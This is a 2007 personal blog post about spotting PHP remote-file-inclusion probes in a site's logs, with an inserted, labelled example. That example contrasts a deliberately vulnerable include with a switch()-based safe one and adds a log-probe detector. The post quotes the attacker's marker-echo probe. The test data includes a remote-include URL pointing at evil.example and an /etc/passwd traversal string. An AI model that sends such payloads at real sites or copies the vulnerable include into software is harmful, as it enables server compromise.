3rd May, 2007

Hack Attack!

Thursday, 3:26 pm in CodeGirl

So yesterday I went around and randomly tidied up a bit of the old code here at void-star.net; mostly putting in meta tags and correct DOCTYPEs.  It occurred to me that while the main page here is a Googlewhore, very few of my other sites get hits.

One of the sites I tidied up a bit was sk.ODE, my itty bitty scripts distribution site.  Firstly I went through and converted my old tag soup HTML to super-fun-happy strict XHTML.  I’m not sure why I chose XHTML, now that I think about it.  Somewhere along the line I became a convert to the strict DOCTYPEs since it makes code so much neater and when it comes down to it I’m hugely anal retentive about some things.  However, my weapon of choice is HTML, not XHTML, mostly because I’m one of those people who sides with Hickson over Zeldman when it comes to serving XHTML as text/html.  But that’s neither here nor there.

One of the things I did do was put up the sk.hits script.  This is something I ripped out of sk.log originally for the purpose of tracking visitors to furc!Loki's character profile.  The popularity of massive, heavy-handed scripts like Mint aside, I’m one of those oldskool souls who prefers neat little lightweight trackers (plus Mint uses deprecated JavaScript that breaks if you’re serving XHTML correctly).  While I was at it, I put two more installs of sk.hits up at the domain; one to cover the collective and one to cover sk.ODE itself.  Uh-oh, problemo; v1.0 of sk.ring uses mysql_pconnect() which doesn’t play well with sk.hits (unless they’re in the same database, which they aren’t).  So I wrote v1.1 which forces a new MySQL connection for its exclusive use, and started running it in parallel with the tracker at Uncreative.

All was well.  I even put all the RSS feeds for the trackers up on my Ajax homepage because I am a chronic e-stalker.

And then I saw something interesting; someone accessing my site using an off-site URL as the query string.  Now, I’m not an idiot and I know what this is; it’s an injection attempt.  It’s for those people who – as I did, once upon an Intrawebs – use query string includes where the query string is the name of the file being included.  This is one of the biggest no-nos in PHP, but you’d despair at how many scripts and sites do it.  Luckily, my sites use a switch()-based includes system (it’s on sk.ODE if you’re curious, but it’s nothing new really) so they don’t suffer from this particular security flaw.  But there it was, right in my logs.

The first attempt was pretty basic, and more of a proof of concept than anything actually dangerous.

<?php
// prints a marker string; if it turns up in the response, the include is exploitable
echo "424242424xxx"."xxx424242424";
?>
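
What a probe like that is hunting for, beside the switch()-based includes mentioned above, as an added PHP example; this is not code from the post or from sk.ODE.  The page names, the evil.example host and the log lines are made up for the example, and whether PHP actually fetches the remote file depends on the host’s allow_url_fopen setting (and, from PHP 5.2, allow_url_include).

```php
<?php
// Added example, not code from sk.ODE or the post: the include pattern a
// probe like the one above is hunting for, the switch()-based alternative,
// and a check for the kind of query string that showed up in the log.
// The page names, paths, hostname and log lines are constructed.

// VULNERABLE: the visitor names the file. With allow_url_fopen on (and, from
// PHP 5.2, allow_url_include), ?page=http://evil.example/x.txt makes PHP
// fetch x.txt over HTTP and run it; the echo in the probe above then lands
// in the page and tells the attacker the hole is real.
function resolve_page_unsafe(array $get): string
{
    return $get['page'] ?? 'home.php';
}

// SAFE: the query string is only ever compared against fixed names and the
// path that gets included is spelled by the code, so an off-site URL or a
// ../../ path simply falls through to the default.
function resolve_page(array $get): string
{
    switch ($get['page'] ?? '') {
        case 'about':   return __DIR__ . '/pages/about.php';
        case 'scripts': return __DIR__ . '/pages/scripts.php';
        case 'contact': return __DIR__ . '/pages/contact.php';
        default:        return __DIR__ . '/pages/home.php';
    }
}

// Flag a request line whose query string carries an absolute URL in any
// parameter, which is what a remote-include probe looks like in the log.
function is_remote_include_probe(string $request): bool
{
    $pos = strpos($request, '?');
    if ($pos === false) {
        return false;
    }
    parse_str(substr($request, $pos + 1), $params);
    foreach ($params as $value) {
        // scheme:// at the start of a value; covers http, https, ftp, ...
        if (is_string($value) && preg_match('#^[a-z][a-z0-9+.-]*://#i', $value)) {
            return true;
        }
    }
    return false;
}

// Constructed request paths, in the shape a tracker like sk.hits would record.
$requests = [
    '/index.php?page=about',
    '/index.php?page=http://evil.example/x.txt?',   // the probe shape
    '/index.php?page=../../../../etc/passwd',       // local traversal, not flagged
];

foreach ($requests as $req) {
    parse_str(substr($req, strpos($req, '?') + 1), $get);
    printf("%-48s unsafe=%-28s safe=%-10s probe=%s\n",
        $req,
        resolve_page_unsafe($get),
        basename(resolve_page($get)),
        is_remote_include_probe($req) ? 'yes' : 'no');
}
```

Run it with the PHP CLI (`php example.php`): the first function hands back whatever the visitor typed, the second only ever yields one of the four fixed paths, and only the second request is flagged as a remote-include probe.  The traversal line is deliberately not flagged; it is a different hole (local file inclusion) that the same switch() also closes.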

I was much more interested in the second attempt (the script seems to have either killed itself on the host server or my AV is blocking it; I didn’t even manage to save it), however.  I think it was a PHP-based shell script; the desktop AV picked it up as a “PHP injection script” and deleted it from cache instantly.  This kind of thing is much more malicious, and lets someone execute OS-level commands; essentially it turns your hijacked web page into a terminal.  The last time I saw one – much simpler than this one but just as devastating – was way way back on a friend’s old Greymatter blog.  Her domain account had been banned since someone had hijacked Greymatter, uploaded a shell script[1] and was running an IRC bot.  In a way, this script is even nastier since it’s non-permanent and will clean itself up when the hijacker leaves the page.  As to what you can actually do with it… well, it depends on how your webserver is set up, and what user/group the webserver runs under, but at best they can vandalise your site and at worst they can infect the whole server.

I dunno, it didn’t do anything but I guess it was just interesting.  I’ve never watched myself be the target of a hack before…

1. Most domain hosts will insta-ban your account if they detect you’re running such a script.

  • v-s.net v0.6 and all content (unless noted) © Dee.